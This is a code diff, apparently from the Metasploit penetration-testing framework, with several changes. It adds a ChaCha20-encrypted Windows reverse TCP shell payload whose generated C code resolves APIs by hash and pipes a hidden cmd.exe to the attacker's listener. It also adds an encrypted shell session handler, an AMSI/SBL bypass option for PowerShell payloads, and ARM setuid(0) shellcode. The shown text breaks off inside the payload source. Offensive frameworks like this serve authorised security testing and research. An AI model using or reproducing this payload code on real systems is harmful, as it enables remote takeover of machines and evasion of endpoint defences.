+          attr_reader :file_name, :keep_exe, :keep_src, :strip_syms, :link_script, :opt_lvl, :mingw_bin
+
+          def initialize(opts={})
+            @file_name = opts[:f_name]
+            @keep_exe = opts[:keep_exe]
+            @keep_src = opts[:keep_src]
+            @strip_syms = opts[:strip_symbols]
+            @link_script = opts[:linker_script]
+            @opt_lvl = opts[:opt_lvl]
+            @mingw_bin = MINGW_X86
+          end
+
+          def self.available?
+            !!(Msf::Util::Helper.which(MINGW_X86))
+          end
+        end
+
+        class X64
+          include Mingw
+
+          attr_reader :file_name, :keep_exe, :keep_src, :strip_syms, :link_script, :opt_lvl, :mingw_bin
+
+          def initialize(opts={})
+            @file_name = opts[:f_name]
+            @keep_exe = opts[:keep_exe]
+            @keep_src = opts[:keep_src]
+            @strip_syms = opts[:strip_symbols]
+            @link_script = opts[:linker_script]
+            @opt_lvl = opts[:opt_lvl]
+            @mingw_bin = MINGW_X64
+          end
+
+          def self.available?
+            !!(Msf::Util::Helper.which(MINGW_X64))
+          end
+        end
+
+        class UncompilablePayloadError < StandardError
+          def initialize(msg='')
+            super(msg)
+          end
+        end
+
+        class CompiledPayloadNotFoundError < StandardError
+          def initialize(msg='Compiled executable not found')
+            super(msg)
+          end
+        end
+      end
+    end
+  end
+end
@@ -30,7 +30,7 @@ module Metasploit
        end
      end

-      VERSION = "4.17.93"
+      VERSION = "4.17.102"
      MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
      PRERELEASE = 'dev'
      HASH = get_hash
@@ -283,8 +283,9 @@ class ReadableText
    end

    # Check
+    has_check = mod.class.instance_methods(false).include?(:check) || mod.respond_to?(:check_host)
    output << "Check supported:\n"
-    output << "#{indent}#{mod.respond_to?(:check) ? 'Yes' : 'No'}\n\n"
+    output << "#{indent}#{has_check ? 'Yes' : 'No'}\n\n"

    # Options
    if (mod.options.has_options?)
@@ -0,0 +1,111 @@
+# -*- coding: binary -*-
+require 'msf/base'
+require 'securerandom'
+require 'msf/core/payload/windows/payload_db_conf'
+
+module Msf
+module Sessions
+
+class EncryptedShell < Msf::Sessions::CommandShell
+
+  include Msf::Session::Basic
+  include Msf::Session::Provider::SingleCommandShell
+  include Msf::Payload::Windows::PayloadDBConf
+
+  attr_accessor :arch
+  attr_accessor :platform
+
+  attr_accessor :iv
+  attr_accessor :key
+  attr_accessor :staged
+
+  attr_accessor :chacha_cipher
+
+  # define some sort of method that checks for
+  # the existence of payload in the db before
+  # using datastore
+  def initialize(rstream, opts={})
+    self.arch ||= ""
+    self.platform = "windows"
+    @staged = opts[:datastore][:staged]
+    super
+  end
+
+  def type
+    "Encrypted"
+  end
+
+  def desc
+    "Encrypted reverse shell"
+  end
+
+  def self.type
+    self.class.type = "Encrypted"
+  end
+
+  def process_autoruns(datastore)
+    @key = datastore[:key] || datastore['ChachaKey']
+    nonce = datastore[:nonce] || datastore['ChachaNonce']
+    @iv = nonce
+
+    # staged payloads retrieve UUID via
+    # handle_connection() in stager.rb
+    unless @staged
+      curr_uuid = rstream.get_once(16, 1)
+      @key, @nonce = retrieve_chacha_creds(curr_uuid)
+      @iv = @nonce ? @nonce : "\0" * 12
+
+      unless @key && @nonce
+        print_status('Failed to retrieve key/nonce for uuid. Resorting to datastore')
+        @key = datastore['ChachaKey']
+        @iv = datastore['ChachaNonce']
+      end
+    end
+
+    new_nonce = SecureRandom.hex(6)
+    new_key = SecureRandom.hex(16)
+
+    @chacha_cipher = Rex::Crypto::Chacha20.new(@key, @iv)
+    new_cipher = @chacha_cipher.chacha20_crypt(new_nonce + new_key)
+    rstream.write(new_cipher)
+
+    @key = new_key
+    @iv = new_nonce
+    @chacha_cipher.reset_cipher(@key, @iv)
+  end
+
+  ##
+  # Overridden from Msf::Sessions::CommandShell#shell_read
+  #
+  # Read encrypted data from console and decrypt it
+  #
+  def shell_read(length=-1, timeout=1)
+    rv = rstream.get_once(length, timeout)
+    decrypted = @chacha_cipher.chacha20_crypt(rv)
+    framework.events.on_session_output(self, decrypted) if decrypted
+
+    return decrypted
+  rescue ::Rex::SocketError, ::EOFError, ::IOError, ::Errno::EPIPE => e
+    shell_close
+    raise e
+  end
+
+  ##
+  # Overridden from Msf::Sessions::CommandShell#shell_write
+  #
+  # Encrypt data then write it to the console
+  #
+  def shell_write(buf)
+    return unless buf
+
+    framework.events.on_session_command(self, buf.strip)
+    encrypted = @chacha_cipher.chacha20_crypt(buf)
+    rstream.write(encrypted)
+  rescue ::Rex::SocketError, ::EOFError, ::IOError, ::Errno::EPIPE => e
+    shell_close
+    raise e
+  end
+
+end
+end
+end
@@ -78,11 +78,11 @@ module Scriptable
      'hostsedit' => 'post/windows/manage/inject_host',
      'keylogrecorder' => 'post/windows/capture/keylog_recorder',
      'killav' => 'post/windows/manage/killav',
-      'metsvc' => 'post/windows/manage/persistence_exe',
+      'metsvc' => 'exploit/windows/local/persistence',
      'migrate' => 'post/windows/manage/migrate',
      'pml_driver_config' => 'exploit/windows/local/service_permissions',
      'packetrecorder' => 'post/windows/manage/rpcapd_start',
-      'persistence' => 'post/windows/manage/persistence_exe',
+      'persistence' => 'exploit/windows/local/persistence',
      'prefetchtool' => 'post/windows/gather/enum_prefetch',
      'remotewinenum' => 'post/windows/gather/wmic_command',
      'schelevator' => 'exploit/windows/local/ms10_092_schelevator',
@@ -136,7 +136,7 @@ module Auxiliary::Login
  def password_prompt?(username=nil)
    return true if(@recvd =~ @password_regex)
    if username
-      return true if( !(username.empty?) and @recvd =~ /#{username}'s/)
+      return true if !(username.empty?) and @recvd.to_s.include?("#{username}'s")
    end
    return false
  end
@@ -48,7 +48,7 @@ module Ssl
    def self.ssl_generate_certificate(cert_vars: {}, ksize: 2048, **opts)
      yr      = 24*3600*365
      vf      = opts[:not_before] || Time.at(Time.now.to_i - rand(yr * 3) - yr)
-      vt      = opts[:not_after]  || Time.at(vf.to_i + (rand(9)+1) * yr)
+      vt      = opts[:not_after]  || Time.at(vf.to_i + (rand(4..9) * yr))
      cvars   = self.rand_vars(cert_vars)
      subject = opts[:subject]    || ssl_generate_subject(cvars)
      ctype   = opts[:cert_type]  || opts[:ca_cert].nil? ? :ca : :server
@@ -114,7 +114,7 @@ class Msf::Encoder::XorDynamic < Msf::Encoder

    # Check badchars in stub
    if Rex::Text.badchar_index(stub.gsub(stub_key_term, "").gsub(stub_payload_term, ""), badchars)
-      raise EncodingError, "Bad character found in stub for the #{self.name} encoder.", caller
+      raise Msf::BadcharError, "Bad character found in stub for the #{self.name} encoder.", caller
    end

    # Set allowed chars
@@ -129,7 +129,7 @@ class Msf::Encoder::XorDynamic < Msf::Encoder
    key = find_key(buf, badchars, keyChars)

    if key == nil
-      raise EncodingError, "A key could not be found for the #{self.name} encoder.", caller
+      raise Msf::BadcharError, "A key could not be found for the #{self.name} encoder.", caller
    end

    # Search for key terminator
@@ -142,7 +142,7 @@ class Msf::Encoder::XorDynamic < Msf::Encoder
    end

    if keyTerm == nil
-      raise EncodingError, "Key terminator could not be found for the #{self.name} encoder.", caller
+      raise Msf::BadcharError, "Key terminator could not be found for the #{self.name} encoder.", caller
    end

    # Encode paylod
@@ -165,14 +165,14 @@ class Msf::Encoder::XorDynamic < Msf::Encoder
    end

    if payloadTerm == nil
-      raise EncodingError, "Payload terminator could not be found for the #{self.name} encoder.", caller
+      raise Msf::BadcharError, "Payload terminator could not be found for the #{self.name} encoder.", caller
    end

    finalPayload = stub.gsub(stub_key_term, keyTerm).gsub(stub_payload_term, payloadTerm) + key + keyTerm + encoded + payloadTerm

    # Check badchars in finalPayload
    if Rex::Text.badchar_index(finalPayload, badchars)
-      raise EncodingError, "Bad character found for the #{self.name} encoder.", caller
+      raise Msf::BadcharError, "Bad character found for the #{self.name} encoder.", caller
    end

    return finalPayload
@@ -65,8 +65,9 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Version
      'method' => 'GET'
    )

-    # No style.css file present
-    return Msf::Exploit::CheckCode::Unknown if res.nil? || res.code != 200
+    if res.nil? || res.code != 200
+      return Msf::Exploit::CheckCode::Unknown("No style.css file present")
+    end

    return extract_and_check_version(res.body.to_s, :style, :theme, fixed_version, vuln_introduced_version)
  end
@@ -96,9 +97,8 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Version
      'method' => 'GET'
    )

-    # file not found
    unless res && res.code == 200
-      return Msf::Exploit::CheckCode::Unknown
+      return Msf::Exploit::CheckCode::Unknown("Unable to retrieve the custom file")
    end

    extract_and_check_version(res.body.to_s, :custom, 'custom file', fixed_version, vuln_introduced_version, regex)
@@ -144,7 +144,9 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Version

    if res.nil? || res.code != 200
      # No readme.txt or Readme.txt present for plugin
-      return Msf::Exploit::CheckCode::Unknown if type == :plugin
+      if type == :plugin
+        return Msf::Exploit::CheckCode::Unknown(res ? "Response code=#{res.code}" : 'No response')
+      end

      # Try again using the style.css file
      return check_theme_version_from_style(name, fixed_version, vuln_introduced_version) if type == :theme
@@ -177,8 +179,9 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Version
      fail("Unknown file type #{type}")
    end

-    # Could not identify version number
-    return Msf::Exploit::CheckCode::Detected if version.nil?
+    unless version
+      return Msf::Exploit::CheckCode::Detected("Could not identify the version number")
+    end

    vprint_status("Found version #{version} of the #{item_type}")

@@ -210,5 +213,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Version
        return Msf::Exploit::CheckCode::Safe
      end
    end
+  rescue ArgumentError => e
+    return Msf::Exploit::CheckCode::Detected(e.message)
  end
 end
@@ -9,6 +9,7 @@ module Exploit::Powershell
      [
        OptBool.new('Powershell::persist', [true, 'Run the payload in a loop', false]),
        OptInt.new('Powershell::prepend_sleep', [false, 'Prepend seconds of sleep']),
+        OptBool.new('Powershell::prepend_protections_bypass', [true, 'Prepend AMSI/SBL bypass', false]),
        OptBool.new('Powershell::strip_comments', [true, 'Strip comments', true]),
        OptBool.new('Powershell::strip_whitespace', [true, 'Strip whitespace', false]),
        OptBool.new('Powershell::sub_vars', [true, 'Substitute variable names', false]),
@@ -209,6 +210,7 @@ module Exploit::Powershell
  #   re-execution if the shellcode finishes
  # @option opts [Integer] :prepend_sleep Sleep for the specified time
  #   before executing the payload
+  # @option opts [Boolean] :prepend_protections_bypass Prepend AMSI/SBL bypass
  # @option opts [String] :method The powershell injection technique to
  #   use: 'net'/'reflection'/'old'
  # @option opts [Boolean] :encode_inner_payload Encodes the powershell
@@ -222,7 +224,7 @@ module Exploit::Powershell
  #
  # @return [String] Powershell command line with payload
  def cmd_psh_payload(pay, payload_arch, opts = {})
-    %i[persist prepend_sleep exec_in_place encode_final_payload encode_inner_payload
+    %i[persist prepend_sleep prepend_protections_bypass exec_in_place encode_final_payload encode_inner_payload
    remove_comspec noninteractive wrap_double_quotes no_equals method].map do |opt|
      opts[opt] = datastore["Powershell::#{opt}"] if opts[opt].nil?
    end
@@ -477,6 +477,15 @@ module Exploit::Remote::RDP
    rdp_send(rdp_build_pkt(pdu_client_font_list))
  end

+  def rdp_move_mouse(x = 1, y = 1)
+    mouse_move_blob = ""
+    mouse_move_blob << "\x04\x80\x0a"    # copypasta FAST PATH stuff from xfreerdp
+    mouse_move_blob << "\x20"            # TS_FP_INPUT_EVENT::eventHeader = 0x20 (FASTPATH_INPUT_EVENT_MOUSE)
+    mouse_move_blob << "\x00\x08"        # TS_FP_POINTER_EVENT::pointerFlags  = 0x0800 (PTRFLAGS_MOVE)
+    mouse_move_blob << [x, y].pack('vv') # TS_FP_POINTER_EVENT::xPos, TS_FP_POINTER_EVENT::yPos
+    rdp_send(mouse_move_blob)
+  end
+
  #
  # Protocol parsers
  #
@@ -1274,7 +1283,6 @@ protected
    result
  end

-
  def cs_core_data(
    version: 0x80004,
    width: 800,
@@ -1289,7 +1297,7 @@ protected
    client_product_id: 1,
    client_dig_product_id: "",
    selected_proto: 0
-  )
+    )

    client_name = Rex::Text.to_unicode(client_name[0..16], 'utf-16le')
    client_dig_product_id = Rex::Text.to_unicode(client_dig_product_id[0..32], 'utf-16le')
@@ -13,6 +13,8 @@ module Options

    super

+    register_options([Msf::Opt::RHOST, Msf::Opt::RPORT(22)])
+
    register_advanced_options([
      # See Msf::Ui::Console::Driver#on_variable_set
      Msf::OptString.new(
@@ -199,6 +199,12 @@ class Framework
  #
  attr_reader   :analyze

+  #
+  # The framework instance's dependency
+  #
+  #
+  attr_accessor   :has_mingw
+
  # The framework instance's db manager. The db manager
  # maintains the database db and handles db events
  #
@@ -12,8 +12,8 @@ def run_scanner(args, login_callback):
    rhost = args['rhost']
    rport = int(args['rport'])
    sleep_interval = float(args['sleep_interval'] or 0)
-
-    if isinstance(userpass, str) or isinstance(userpass, unicode):
+    # python 2/3 compatibility hack
+    if isinstance(userpass, str) or ('unicode' in vars(__builtins__) and isinstance(userpass, unicode)):
        userpass = [ attempt.split(' ', 1) for attempt in userpass.splitlines() ]

    curr = 0
@@ -42,7 +42,7 @@ class Msf::Modules::Loader::Directory < Msf::Modules::Loader::Base
          entry_descendant_pathname = Pathname.new(entry_descendant_path)
          relative_entry_descendant_pathname = entry_descendant_pathname.relative_path_from(full_entry_pathname)
          relative_entry_descendant_path = relative_entry_descendant_pathname.to_s
-          next if File::basename(relative_entry_descendant_path) == "example.rb"
+          next if File::basename(relative_entry_descendant_path).start_with?('example')
          # The module_reference_name doesn't have a file extension
          module_reference_name = module_reference_name_from_path(relative_entry_descendant_path)

@@ -32,6 +32,7 @@ class Payload < Msf::Module
  require 'msf/core/payload/firefox'
  require 'msf/core/payload/mainframe'
  require 'msf/core/payload/hardware'
+  require 'metasploit/framework/compiler/mingw'

  # Universal payload includes
  require 'msf/core/payload/multi'
@@ -69,6 +70,12 @@ class Payload < Msf::Module
  def initialize(info = {})
    super

+    #
+    # Gets the Dependencies if the payload requires external help
+    # to work
+    #
+    self.module_info['Dependencies'] = self.module_info['Dependencies'] || []
+
    # If this is a staged payload but there is no stage information,
    # then this is actually a stager + single combination.  Set up the
    # information hash accordingly.
@@ -202,7 +209,7 @@ class Payload < Msf::Module
    pl = nil
    begin
      pl = generate()
-    rescue NoCompatiblePayloadError
+    rescue NoCompatiblePayloadError, Metasploit::Framework::Compiler::Mingw::UncompilablePayloadError
    end
    pl ||= ''
    pl.length
@@ -238,6 +245,13 @@ class Payload < Msf::Module
    return module_info['Payload'] ? module_info['Payload']['Offsets'] : nil
  end

+  #
+  # Returns the compiler dependencies if the payload has one
+  #
+  def dependencies
+    module_info['Dependencies']
+  end
+
  #
  # Returns the staging convention that the payload uses, if any.  This is
  # used to make sure that only compatible stagers and stages are built
@@ -429,6 +429,21 @@ module Msf::Payload::Linux
        app << "\x58"                 #    pop     rax                       #
        app << "\x0f\x05"             #    syscall                           #
      end
+    elsif (test_arch.include?(ARCH_ARMLE))
+      if (datastore['PrependSetuid'])
+        # setuid(0)
+        pre << "\x00\x00\x20\xe0"     #    eor r0, r0, r0                    #
+        pre << "\x17\x70\xa0\xe3"     #    mov r7, #23                       #
+        pre << "\x00\x00\x00\xef"     #    svc                               #
+      end
+      if (datastore['PrependSetresuid'])
+        # setresuid(ruid=0, euid=0, suid=0)
+        pre << "\x00\x00\x20\xe0"     #    eor r0, r0, r0                    #
+        pre << "\x01\x10\x21\xe0"     #    eor r1, r1, r1                    #
+        pre << "\x02\x20\x22\xe0"     #    eor r2, r2, r2                    #
+        pre << "\xa4\x70\xa0\xe3"     #    mov r7, #0xa4                     #
+        pre << "\x00\x00\x00\xef"     #    svc                               #
+      end
    end

    return (pre + buf + app)
@@ -156,6 +156,18 @@ module Msf::Payload::Stager
    return raw
  end

+  def sends_hex_uuid?
+    false
+  end
+
+  def format_uuid(uuid_raw)
+    if sends_hex_uuid?
+      return uuid_raw
+    end
+
+    return Msf::Payload::UUID.new({raw: uuid_raw})
+  end
+
  #
  # Transmit the associated stage.
  #
@@ -169,7 +181,7 @@ module Msf::Payload::Stager
        if include_send_uuid
          uuid_raw = conn.get_once(16, 1)
          if uuid_raw
-            opts[:uuid] = Msf::Payload::UUID.new({raw: uuid_raw})
+            opts[:uuid] = format_uuid(uuid_raw)
          end
        end
      end
@@ -0,0 +1,30 @@
+require 'msf/core'
+require 'securerandom'
+
+module Msf
+  module Payload::Windows::EncryptedPayloadOpts
+    include Msf::Payload::UUID::Options
+
+    LINK_SCRIPT_PATH = File.join(Msf::Config.data_directory, 'utilities', 'encrypted_payload')
+
+    def initialize(info={})
+      super
+
+      register_options(
+      [
+        OptBool.new('CallWSAStartup', [ false, 'Adds the function that initializes the Winsock library', true ]),
+        OptString.new('ChachaKey', [ false, 'The initial key to encrypt payload traffic with', SecureRandom.hex(16) ]),
+        OptString.new('ChachaNonce', [ false, 'The initial nonce to use to encrypt payload traffic with', SecureRandom.hex(6) ])
+      ], self.class)
+
+      register_advanced_options(
+      [
+        OptBool.new('StripSymbols', [ false, 'Payload will be compiled without symbols', true ]),
+        OptEnum.new('OptLevel', [ false, 'The optimization level to compile with', 'O2', [ 'Og', 'Os', 'O0', 'O1', 'O2', 'O3' ] ]),
+        OptBool.new('KeepSrc', [ false, 'Keep source code after compiling it', false ]),
+        OptBool.new('KeepExe', [ false, 'Keep executable after compiling the payload', false ]),
+        OptBool.new('PayloadUUIDTracking', [ true, 'Whether or not to automatically register generated UUIDs', true ])
+      ], self.class)
+    end
+  end
+end
@@ -0,0 +1,602 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'rex/peparsey'
+require 'msf/core/payload/uuid/options'
+require 'msf/core/payload/windows'
+require 'msf/core/payload/windows/encrypted_payload_opts'
+require 'msf/core/payload/windows/payload_db_conf'
+require 'metasploit/framework/compiler/mingw'
+require 'rex/crypto/chacha20'
+
+module Msf
+
+###
+#
+# encrypted reverse tcp payload for Windows
+#
+###
+module Payload::Windows::EncryptedReverseTcp
+
+  include Msf::Payload::UUID::Options
+  include Msf::Payload::Windows
+  include Msf::Payload::Windows::EncryptedPayloadOpts
+  include Msf::Payload::Windows::PayloadDBConf
+
+
+  def initialize(*args)
+    super
+  end
+
+  def generate(opts={})
+    opts[:uuid] ||= generate_payload_uuid.puid_hex
+    iv = datastore['ChachaNonce']
+
+    conf =
+    {
+      call_wsastartup: datastore['CallWSAStartup'],
+      port:            format_ds_opt(datastore['LPORT']),
+      host:            format_ds_opt(datastore['LHOST']),
+      key:             datastore['ChachaKey'],
+      nonce:           datastore['ChachaNonce'],
+      iv:              iv,
+      uuid:            opts[:uuid],
+      staged:          staged?
+    }
+
+    src = ''
+    if staged?
+      src = generate_stager(conf)
+    else
+      src = generate_c_src(conf)
+    end
+
+    link_script = module_info['DefaultOptions']['LinkerScript']
+    compile_opts =
+    {
+      strip_symbols: datastore['StripSymbols'],
+      linker_script: link_script,
+      opt_lvl:       datastore['OptLevel'],
+      keep_src:      datastore['KeepSrc'],
+      keep_exe:      datastore['KeepExe'],
+      f_name:        Tempfile.new(staged? ? 'reverse_pic_stager' : 'reverse_pic_stageless').path,
+      arch:          self.arch_to_s
+    }
+
+    comp_code = get_compiled_shellcode(src, compile_opts)
+
+    chacha_conf =
+    {
+      'uuid'  =>  conf[:uuid],
+      'key'   =>  conf[:key],
+      'nonce' =>  conf[:nonce]
+    }
+    save_conf_to_db(chacha_conf)
+
+    comp_code
+  end
+
+  def initial_code
+    src = headers
+    src << align_rsp if self.arch_to_s.eql?('x64')
+
+    if staged?
+      src << chacha_func_staged
+    else
+      src << chacha_func
+    end
+    src << exit_proc
+  end
+
+  def generate_stager(conf)
+    src = initial_code
+
+    if conf[:call_wsastartup]
+      src << init_winsock
+    end
+
+    src << comm_setup
+    src << get_load_library(conf[:host], conf[:port])
+    src << call_init_winsock if conf[:call_wsastartup]
+    src << start_comm(conf[:uuid])
+    src << stager_comm
+  end
+
+  def sends_hex_uuid?
+    true
+  end
+
+  def include_send_uuid
+    true
+  end
+
+  def generate_stage(opts={})
+    conf = opts[:datastore] || datastore
+    conf[:staged] = true
+    stage_uuid = opts[:uuid] || uuid
+    key, nonce = retrieve_chacha_creds(stage_uuid)
+
+    unless key && nonce
+      print_status('No existing key/nonce in db. Resorting to datastore options.')
+      key = conf['ChachaKey']
+      nonce = conf['ChachaNonce']
+    end
+    iv = nonce
+
+    link_script = module_info['DefaultOptions']['LinkerScript']
+    comp_opts =
+    {
+      strip_symbols: false,
+      linker_script: link_script,
+      keep_src:      datastore['KeepSrc'],
+      keep_exe:      datastore['KeepExe'],
+      f_name:        Tempfile.new('reverse_pic_stage').path,
+      arch:          self.arch_to_s
+    }
+
+    src = initial_code
+    src << get_new_key
+    src << init_proc
+    src << exec_payload_stage
+    shellcode = get_compiled_shellcode(src, comp_opts)
+
+    stage_obj = Rex::Crypto::Chacha20.new(key, iv)
+    stage_obj.chacha20_crypt(shellcode)
+  end
+
+  def generate_c_src(conf)
+    src = initial_code
+
+    if conf[:call_wsastartup]
+      src << init_winsock
+    end
+
+    src << comm_setup
+    src << get_new_key
+    src << init_proc
+    src << get_load_library(conf[:host], conf[:port])
+    src << call_init_winsock if conf[:call_wsastartup]
+    src << start_comm(conf[:uuid])
+    src << single_comm
+  end
+
+  def get_hash(lib, func)
+    Rex::Text.block_api_hash(lib, func)
+  end
+
+  def get_compiled_shellcode(src, opts={})
+    comp_obj = nil
+    case opts[:arch]
+    when 'x86'
+      comp_obj = Metasploit::Framework::Compiler::Mingw::X86.new(opts)
+    when 'x64'
+      comp_obj = Metasploit::Framework::Compiler::Mingw::X64.new(opts)
+    end
+
+    compiler_out = comp_obj.compile_c(src)
+    unless compiler_out.empty?
+      elog(compiler_out)
+      raise Metasploit::Framework::Compiler::Mingw::UncompilablePayloadError.new('Payload did not compile. Check the logs for further information.')
+    end
+
+    comp_file = "#{opts[:f_name]}.exe"
+    raise Metasploit::Framework::Compiler::Mingw::CompiledPayloadNotFoundError unless File.exist?(comp_file)
+    bin = File.binread(comp_file).strip
+    bin = Rex::PeParsey::Pe.new(Rex::ImageSource::Memory.new(bin))
+
+    text_section = bin.sections.first
+    text_section = text_section._isource
+
+    comp_obj.cleanup_files
+    text_section.rawdata
+  end
+
+  #
+  # Options such as the LHOST and PORT
+  # need to become a null-terminated array
+  # to ensure they exist in the .text section.
+  #
+  def format_ds_opt(opt)
+    modified = ''
+
+    opt = opt.to_s
+    opt.split('').each { |elem| modified << "\'#{elem}\', " }
+    modified = "#{modified}0"
+  end
+
+  def headers
+    %Q^
+      #include "winsock_util.h"
+      #include "payload_util.h"
+      #include "kernel32_util.h"
+
+      #include "chacha.h"
+    ^
+  end
+
+  def align_rsp
+    %Q^
+      void AlignRSP()
+      {
+        asm("push %rsi                      \\t\\n\\
+             mov %rsp, %rsi                 \\t\\n\\
+             and $0x0FFFFFFFFFFFFFFF0, %rsp \\t\\n\\
+             sub $0x020, %rsp               \\t\\n\\
+             call ExecutePayload            \\t\\n\\
+             mov %rsi, %rsp                 \\t\\n\\
+             pop %rsi                       \\t\\n\\
+             ret");
+      }
+    ^
+  end
+
+  def chacha_func_staged
+    %Q^
+      char *chacha_data(char *buf, int len, chacha_ctx *ctx)
+      {
+        chacha_encrypt_bytes(ctx, buf, buf, len);
+        buf[len] = '\\0';
+
+        return buf;
+      }
+    ^
+  end
+
+  def chacha_func
+    %Q^
+      char *chacha_data(char *buf, int len, chacha_ctx *ctx)
+        {
+          FuncVirtualAlloc VirtualAlloc = (FuncVirtualAlloc) GetProcAddressWithHash(#{get_hash('kernel32.dll', 'VirtualAlloc')}); // hash('kernel32.dll',
+          char *out = VirtualAlloc(NULL, len+1, MEM_COMMIT, PAGE_READWRITE);
+          chacha_encrypt_bytes(ctx, buf, out, len);
+          out[len] = '\\0';
+          return out;
+        }
+    ^
+  end
+
+  def exit_proc
+    %Q^
+      UINT ExitProc()
+      {
+        DWORD term_status;
+        FuncGetCurrentProcess GetCurrentProcess = (FuncGetCurrentProcess) GetProcAddressWithHash(#{get_hash('kernel32.dll', 'GetCurrentProcess')}); // hash('kernel32.dll', 'GetCurrentProcess') -> 0x51e2f352
+        FuncGetExitCodeProcess GetExitCodeProcess = (FuncGetExitCodeProcess) GetProcAddressWithHash(#{get_hash('kernel32.dll', 'GetExitCodeProcess')}); // hash('kernel32.dll', 'GetExitCodeProcess' -> 0xee54785f
+
+        HANDLE curr_proc_handle = GetCurrentProcess();
+        GetExitCodeProcess(curr_proc_handle, &term_status);
+
+        return term_status;
+      }
+    ^
+  end
+
+  def init_winsock
+    %Q^
+      void init_winsock()
+      {
+        WSADATA wsadata;
+        FuncWSAStartup WSAInit;
+        UINT term_proc_status = ExitProc();
+        FuncExitProcess ExitProcess = (FuncExitProcess) GetProcAddressWithHash(#{get_hash('kernel32.dll', 'ExitProcess')}); // hash('kernel32.dll', 'ExitProcess') -> 0x56a2b5f0
+
+        WSAInit = (FuncWSAStartup) GetProcAddressWithHash(#{get_hash('ws2_32.dll', 'WSAStartup')}); // hash('ws2_32.dll', 'WSAStartup') -> 0x006B8029
+        if(WSAInit(MAKEWORD(2, 2), &wsadata))
+        {
+          ExitProcess(term_proc_status);
+        }
+      }
+
+    ^
+  end
+
+  def comm_setup
+    %Q^
+      struct addrinfo *conn_info_setup(char *i, char *p)
+      {
+        UINT term_proc_stat = ExitProc();
+        struct addrinfo hints, *results = NULL, *first = NULL;
+        FuncGetAddrInfo GetAddrInf = (FuncGetAddrInfo) GetProcAddressWithHash(#{get_hash('ws2_32.dll', 'getaddrinfo')}); // hash('ws2_32.dll', 'getaddrinfo') -> 0x14f1f695
+        FuncFreeAddrInfo FreeAddrInf = (FuncFreeAddrInfo) GetProcAddressWithHash(#{get_hash('ws2_32.dll', 'freeaddrinfo')}); // hash('ws2_32.dll', 'freeaddrinfo') -> 0x150784f5
+        FuncExitProcess ExitProcess = (FuncExitProcess) GetProcAddressWithHash(#{get_hash('kernel32.dll', 'ExitProcess')}); // hash('kernel32.dll', 'ExitProcess') -> 0x56a2b5f0
+
+        SecureZeroMemory(&hints, sizeof(hints));
+        hints.ai_family = AF_INET;
+        hints.ai_socktype = SOCK_STREAM;
+        hints.ai_protocol = IPPROTO_TCP;
+
+        if(GetAddrInf(i, p, &hints, &results))
+        {
+          ExitProcess(term_proc_stat);
+        }
+
+        first = results;
+        if(first == NULL)
+        {
+          FreeAddrInf(results);
+          ExitProcess(term_proc_stat);
+        }
+
+        return first;
+      }
+    ^
+  end
+
+  def get_new_key
+    %Q^
+      char *get_new_key(SOCKET s)
+      {
+        FuncVirtualAlloc VirtualAlloc = (FuncVirtualAlloc) GetProcAddressWithHash(#{get_hash('kernel32.dll', 'VirtualAlloc')}); // hash('kernel32.dll',
+        FuncRecv RecvData = (FuncRecv) GetProcAddressWithHash(#{get_hash('ws2_32.dll', 'recv')});
+
+        char *received = VirtualAlloc(NULL, 45, MEM_COMMIT, PAGE_READWRITE);
+        int recv_num = RecvData(s, received, 44, 0);
+
+        received[44] = '\\0';
+        return received;
+      }
+    ^
+  end
+
+  def init_proc
+    %Q^
+      HANDLE* init_process(SOCKET s)
+      {
+        char cmd[] = { 'c', 'm', 'd', 0 };
+        STARTUPINFO si;
+        SECURITY_ATTRIBUTES sa;
+        PROCESS_INFORMATION pi;
+        UINT proc_stat = ExitProc();
+        HANDLE out_rd, out_wr, in_rd, in_wr;
+        FuncExitProcess ExitProcess = (FuncExitProcess) GetProcAddressWithHash(#{get_hash('kernel32.dll', 'ExitProcess')}); // hash('kernel32.dll', 'ExitProcess') -> 0x56a2b5f0
+
+        SecureZeroMemory(&si, sizeof(si));
+        SecureZeroMemory(&sa, sizeof(sa));
+        SecureZeroMemory(&pi, sizeof(pi));
+
+        si.cb = sizeof(si);
+        sa.nLength = sizeof(sa);
+        sa.lpSecurityDescriptor = NULL;
+        sa.bInheritHandle = TRUE;
+
+        FuncCreatePipe CreatePipe = (FuncCreatePipe) GetProcAddressWithHash(#{get_hash('kernel32.dll', 'CreatePipe')}); // hash('kernel32.dll', 'CreatePipe') -> 0xeafcf3e
+        CreatePipe(&out_rd, &out_wr, &sa, 0);
+        CreatePipe(&in_rd, &in_wr, &sa, 0);
+
+        FuncSetHandleInformation SetHandleInformation = (FuncSetHandleInformation) GetProcAddressWithHash(#{get_hash('kernel32.dll', 'SetHandleInformation')}); // hash('kernel32.dll', 'SetHandleInformation') -> 0x1cd313ca
+        SetHandleInformation(out_rd, HANDLE_FLAG_INHERIT, 0);
+        SetHandleInformation(in_wr, HANDLE_FLAG_INHERIT, 0);
+
+        si.dwFlags = STARTF_USESTDHANDLES;
+        si.hStdError = si.hStdOutput = out_wr;
+        si.hStdInput = in_rd;
+
+        FuncCreateProcess CreateProcess = (FuncCreateProcess) GetProcAddressWithHash(#{get_hash('kernel32.dll', 'CreateProcessA')}); // hash('kernel32.dll', 'CreateProcess') -> 0x863fcc79
+        if(!CreateProcess(NULL, cmd, &sa, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi))
+        {
+          ExitProcess(proc_stat);
+        }
+
+        FuncCloseHandle CloseHandle = (FuncCloseHandle) GetProcAddressWithHash(#{get_hash('kernel32.dll', 'CloseHandle')}); // hash('kernel32.dll', 'CloseHandle') -> 0x528796c6
+        CloseHandle(pi.hProcess);
+        CloseHandle(pi.hThread);
+
+        FuncGlobalAlloc GlobalAlloc = (FuncGlobalAlloc) GetProcAddressWithHash(#{get_hash('kernel32.dll', 'GlobalAlloc')}); // hash('kernel32.dll', 'GlobalAlloc') -> 0x520f76f6
+        HANDLE *handle_arr = GlobalAlloc(GMEM_FIXED, sizeof(HANDLE) * 2);
+
+        handle_arr[0] = out_rd;
+        handle_arr[1] = in_wr;
+
+        return handle_arr;
+      }
+
+      void communicate(HANDLE out, HANDLE in, SOCKET s)
+      {
+        DWORD data = 0;
+        char buf[512];
